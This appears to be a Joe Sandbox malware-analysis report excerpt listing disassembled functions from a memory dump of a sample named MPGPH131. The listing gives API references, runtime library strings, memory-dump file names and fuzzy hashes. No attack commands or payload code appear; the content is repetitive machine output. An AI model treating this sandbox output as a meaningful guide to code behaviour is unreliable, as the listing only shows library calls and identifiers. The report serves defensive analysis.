std::_Lockit::_Lockit.LIBCPMT ref: 0089AEB3
std::_Lockit::_Lockit.LIBCPMT ref: 0089AED5
std::_Lockit::~_Lockit.LIBCPMT ref: 0089AEF5
std::_Lockit::~_Lockit.LIBCPMT ref: 0089AF1F
std::_Lockit::_Lockit.LIBCPMT ref: 0089AF8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0089AFD9
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0089AFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 0089B088
std::_Facet_Register.LIBCPMT ref: 0089B095

Strings

bad locale name, xrefs: 0089B0AF

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
Instruction ID: 3633ffd5ebbd686a1bcb5cbae962c08b07d5a8eac1d4d1752c1f9b410a1c8588
Opcode Fuzzy Hash: 13cdfc13f8dc3e13eccd5ab674a8e27c12ef273b4f4a63898987ee7d0ecffb3b
Instruction Fuzzy Hash: 32618FB1D002489FDF25EFA4D885B9EBBB4FF54310F184068E815E7281EB74E909CB92

Function 00833770 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008337E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00833835
__Getctype.LIBCPMT ref: 0083384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0083386A
std::_Lockit::~_Lockit.LIBCPMT ref: 008338FF

Strings

bad locale name, xrefs: 0083391C

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
Instruction ID: 3e1d8eba16de450203cf0a7c27a5c6d14f9aec52586b4c12fef91d7e31af422b
Opcode Fuzzy Hash: e84289729bb3bdd6524ee65538d88bf8bec3f3756b8fce8b8b9e0a9a7181fd0b
Instruction Fuzzy Hash: FC515EF1D00248DBDB10DFA8D88579EFBB8AF54314F144569EC18AB281E775AA48CB92

Function 00910880 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 009108B7
___except_validate_context_record.LIBVCRUNTIME ref: 009108BF
_ValidateLocalCookies.LIBCMT ref: 00910948
__IsNonwritableInCurrentImage.LIBCMT ref: 00910973
_ValidateLocalCookies.LIBCMT ref: 009109C8

Strings

csm, xrefs: 0091095D

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
Instruction ID: 779e5196270de1f02ee3f05951ae80f98a6e88a540b8e97ec691e262857a04e7
Opcode Fuzzy Hash: cea4b8c3a9620023e79b984a71b0f658434c391d8c635098c65f21254115b33f
Instruction Fuzzy Hash: D841B234B0020DABDF10DF68C890BEE7BA9AF84324F148055E9189B352D776EAC5CB91

Function 00899520 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00899543
std::_Lockit::_Lockit.LIBCPMT ref: 00899566
std::_Lockit::~_Lockit.LIBCPMT ref: 00899586
std::_Facet_Register.LIBCPMT ref: 008995FB
std::_Lockit::~_Lockit.LIBCPMT ref: 00899613
Concurrency::cancel_current_task.LIBCPMT ref: 0089962B

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
Instruction ID: eb44711276c718821d91ad609700a5d3161983fa001d2db6998e0bf7a11bd024
Opcode Fuzzy Hash: 6c4163b1aff48035ea12062372814cc25d1ba616feb6ed2e1b83dc473e44c94a
Instruction Fuzzy Hash: B841C0719042199FCF12EF58D841BAEBBB4FB41314F1A421DE895AB391DB70AD00CBD1

Function 00835DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008360F2
___std_exception_destroy.LIBVCRUNTIME ref: 0083617F
___std_exception_copy.LIBVCRUNTIME ref: 00836248

Strings

recursive_directory_iterator::operator++, xrefs: 008361CC

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
Instruction ID: 6abc2432ae1aa8394e4f1908dde132cecd307a0d681bc790e2a7d9b386dd8c65
Opcode Fuzzy Hash: 9e433ea44860e8704a97427bcb84d8f37d95a4bc1855ddc215f456440b9e67d0
Instruction Fuzzy Hash: CEE1E2B19006089FCB28DF68D845B9EB7F9FF84700F14861DE456E7781EB74AA44CBA1

Function 008384C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008386DE
___std_exception_destroy.LIBVCRUNTIME ref: 008386ED

Strings

at line , xrefs: 00838518
, column , xrefs: 00838555, 0083856B

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
Instruction ID: ecadccc9c029574b4aa03c6224bf2cc2ad88356f850395210eee04ce2f320956
Opcode Fuzzy Hash: 80e264b21f34976b6bf6484267a8561e0e546724967965745aa5010f9c196d8c
Instruction Fuzzy Hash: 98612771A002089FDB08DB68DC85BAEBBB5FF84314F148618F415E7792EB74AA8487D1

Function 008A34C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008A3946
___std_exception_destroy.LIBVCRUNTIME ref: 008A395F
___std_exception_destroy.LIBVCRUNTIME ref: 008A3A97
___std_exception_destroy.LIBVCRUNTIME ref: 008A3AB0
___std_exception_destroy.LIBVCRUNTIME ref: 008A3C16
___std_exception_destroy.LIBVCRUNTIME ref: 008A3C2F
___std_exception_destroy.LIBVCRUNTIME ref: 008A4479
___std_exception_destroy.LIBVCRUNTIME ref: 008A4492

Strings

value, xrefs: 008A439F

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
Instruction ID: 608fd010909d0e36fff6e03786e85f6cbe4fadffd1502c0fd638d7a98cc45c84
Opcode Fuzzy Hash: 67f0856ca8c4f0a9781fcac27f8960ee0119878b42d4432d1990ce2fd32381c8
Instruction Fuzzy Hash: 1951D070C01258DFEF14DBA8CD85BDEBBB4BF46304F144258E055A7682D7746A88CB62

Function 00833B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00833C0F

Strings

ios_base::failbit set, xrefs: 00833AC8, 00833BB1
ios_base::eofbit set, xrefs: 00833BB6
ios_base::badbit set, xrefs: 00833BA7, 00833BD2, 00833BF3

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
Instruction ID: 69dbacdfd89e02f1a3e756a8d3ad0db787793b84228586769ec533d15876319d
Opcode Fuzzy Hash: ba723654d6c01babdfb7ddbcd5112f6d87b1deb18b30d5540261661d822906ec
Instruction Fuzzy Hash: ED1193B29007086BC710DE59D805B96B7E8EF85320F14892AFD58D7641F770A954CBD1

Function 008A2A60 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 008A2F43

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
Instruction ID: 97c2cf56752f55eb0153d999ddb41ea8c71a43833ca59694411cbe95696e99a7
Opcode Fuzzy Hash: 15a8e40ab3b9a720bbc226ac1cd9138e596cb45eb4fd09cee6aaccd3d5ff5f5e
Instruction Fuzzy Hash: 28E1D171A002099FDB28DF6CC894A6DBBA1FF89310F148369E819DB795E730ED51CB90

Function 00838080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0083844D

Strings

ror, xrefs: 008380D4
parse error, xrefs: 00838149, 00838162

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
Instruction ID: d3418e3e5ea75af765122dc639ca0fe3fa29b5bdb2028161d1030390b89fc7e3
Opcode Fuzzy Hash: 8865f9ca2000c68dc474f62161b402a8e263f8027221041d7aa81b5cbe19419e
Instruction Fuzzy Hash: 82C1E171910749DFDB08CF68CC85BADBB72FF95304F148248E404AB692DB74AA84CB91

Function 00837DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00838051
___std_exception_destroy.LIBVCRUNTIME ref: 00838060

Strings

[json.exception., xrefs: 00837E1C

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
Instruction ID: 1831bca9e01808b1a37b215b0365e21a095703352ce90d98bf2e7177d9c66ae6
Opcode Fuzzy Hash: 11895a3bf62bd962d17445be7e7a22b3d6937293ef071da762782ce7f1710bff
Instruction Fuzzy Hash: B89107719002089FDB18DF68CC95B9EBBB1FF85314F14425DF410AB692DBB4EA84C791

Function 00833A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00833C0F

Strings

ios_base::failbit set, xrefs: 00833AC8
ios_base::badbit set, xrefs: 00833BA7, 00833BD2, 00833BF3

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
